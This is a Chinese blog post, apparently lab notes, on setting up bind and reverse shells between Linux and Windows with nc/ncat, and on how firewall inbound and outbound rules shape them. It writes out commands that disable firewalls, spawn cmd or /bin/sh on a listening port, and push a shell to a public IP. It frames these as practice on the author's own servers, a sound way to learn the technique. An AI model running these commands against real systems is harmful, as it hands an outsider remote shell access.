当前位置: 首页 > news >正文

Day05 实例:正向反向连接内外网环境防火墙出入站

一、正反向连接

0、先将防火墙关闭

Linux: sudo systemctl stop firewalld
Windows:netsh advfirewall set allprofiles state off

1、正向连接

1.1 Linux连接Windows
00x1   开启两台服务器  并且给Windows拖入nc.exe 

00x2   Windows绑定自己5566端口 等待Linux的监听

C:\Users\Administrator\Desktop>nc -e cmd -lvvp 5566

 

00x3  Linux去访问Windows的端口

[root@iZj6c8wqhhs4wojatf6sqgZ ~]# ncat 47.242.11.22 5566

 

1.2 Windows连接Linux
 00x1 关闭Linux的防火墙

 sudo systemctl stop firewalld

 00x2 Linux绑定自己的端口

ncat -e /bin/sh -lvp 5566

00x3 等待Windows连接Linux的ip端口进行监听  并测试结果
2、反向连接
2.1 Linux连接Windows
00x1 Linux实现本地监听 

ncat -lvp 5566

 

00x2 Windows主动绑定Linux的ip和端口

nc -e cmd 47.242.11.22 5566

 00x3 Linux本地监听成功,测试

 

2.2 Windows连接Linux
00x1 Windows关闭防火墙

netsh advfirewall set allprofiles state off

00x2 Linux主动绑定Windows的ip和端口

ncat -e /bin/sh 47.242.22.11 5566

00x3 Windows实现本地监听

nc -lvp 5566

二、内外网连接

配置要求:vm搭建的win10 + Linux监听
原理:由于win10是nat连接的,利用我本机进行上网,也就共用一个公网ip,所以说只能win10进行反向连接Linux。
步骤:
00x1  Linux去主动监听本地的端口5399

 ncat -lvp 5399

 

00x2  win10主动绑定Linux的ip和端口

C:\Users\admin\Desktop>nc -e cmd 47.242.11.22 5399

00x3  成功监听到win10

测试成功。 

 

三、防火墙出入站

对入站有要求的话,就只能肉鸡去主动绑定攻击机的端口和ip了。那么就是反向连接的过程。

对出站有要求的话,理论上来说是可以进行正向连接,但是防火墙是严进宽出,如果对出都有要求,那么实际情况下进站的话也是会被禁止的。

http://www.dtcms.com/a/59450.html

相关文章:

  • 【HarmonyOS Next】鸿蒙应用故障处理思路详解
  • Java常用集合与映射的线程安全问题深度解析
  • 【CSS3】筑基篇
  • Google参数逆向 谷歌搜索
  • C++蓝桥杯基础篇(十)
  • tcc编译器教程2 编译lua解释器
  • 如何在内网私有化离线部署AI大模型?有哪些AI模型可以在内网环境私有化离线部署?
  • 雪花算法
  • 1.python基础知识点1
  • STM32全系大阅兵(1)
  • 【Python】omegaconf 用法详解
  • 爬虫案例十二js 逆向模拟登录集思录网
  • [MERN] 使用 socket.io 实现即时通信功能
  • 【网络编程】事件选择模型
  • 数据库的安装与配置和创建数据库与表
  • PHIAF:基于GAN的数据增强和基于序列的特征融合的噬菌体-宿主相互作用预测
  • 现代互联网网络安全与操作系统安全防御概要
  • 采用内存局部性分配有什么好处?
  • 蓝队第三次
  • RocketMQ控制台显示NOT_CONSUME_YET
  • C++—list类的使用及模拟实现
  • C语言学习day25:WinAPI编程进阶02-第一个窗口应用程序开发
  • StringBuilder常用方法详解
  • 基于操作系统控制平台-深入剖析CPUGPU Tracing分析
  • 【Linux】初识线程
  • 网格图学习(附题单与做题思路)
  • 【开源界的Manus替代战:模块化设计 vs 跨平台实战 vs 全能开发,谁主沉浮?】
  • DNASimCLR:一种基于对比学习的基因序列数据分类的深度学习方法
  • 生成任务,大模型
  • GHCTF2025--Web